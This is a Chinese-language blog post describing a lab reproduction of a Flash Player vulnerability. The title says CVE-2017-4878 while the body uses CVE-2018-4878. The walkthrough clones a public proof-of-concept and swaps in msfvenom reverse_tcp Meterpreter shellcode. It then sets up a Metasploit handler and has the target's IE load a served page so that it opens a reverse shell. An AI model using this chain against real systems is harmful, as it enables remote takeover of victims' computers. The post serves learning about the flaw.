CVE-2017-4878 漏洞复现(Flash Player当前最新版本28.0.0.137以及之前的所有版本)

CVE-2017-4878 漏洞复现
**

漏洞介绍

**

1、漏洞概述
Flash Player当前最新版本28.0.0.137以及之前的所有版本
2 漏洞复现环境:
渗透机:Kali Linux + POC代码
靶机:win7+IE8.0+FLASH player
为了节省时间直接在 GitHub上下载poc 代码

3 漏洞复现实验过程:
复制下载链接:
在这里插入图片描述

git clone https://github.com/anbai-inc/CVE-2018-4878.git

使用git clone 命令 + 下载链接的方式 将POC 代码复制到本地 home目录下
或者直接在本机上下载然后复制到kali 中也是一样的效果
在这里插入图片描述

打开文件
在这里插入图片描述

我们需要对cve-2018-48778.py进行修改
在这里插入图片描述

将True 修改为False

还需要替换掉代码中原有的shellcode
在这里插入图片描述

使用命令
Msfvenom -p windows/meterpreter/reverse_tcp lhost = ip lport = port –f python > filename.txt
在这里插入图片描述
Cat shellcode.txt
在这里插入图片描述
将生成的shellcode.txt 内容替换原来 cve-2018-4878.py 中的shellcode
在这里插入图片描述

运行python 程序
在这里插入图片描述
运行出错了
貌似是程序中路径的问题
将路径修改成当前文件的路径
在这里插入图片描述
运行成功
在这里插入图片描述
查看文件
在这里插入图片描述
进入msfconsole 设置载荷
在这里插入图片描述
设置lhost 和lport
在这里插入图片描述
打开IE 访问http://192.168.88.107/test.html
在这里插入图片描述
但是由于电脑 falsh 插件的更新 和补丁的修复
没有向kali 反弹shell 如果换为28.0.0.137以及之前的所有版本都会建立反弹shell
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值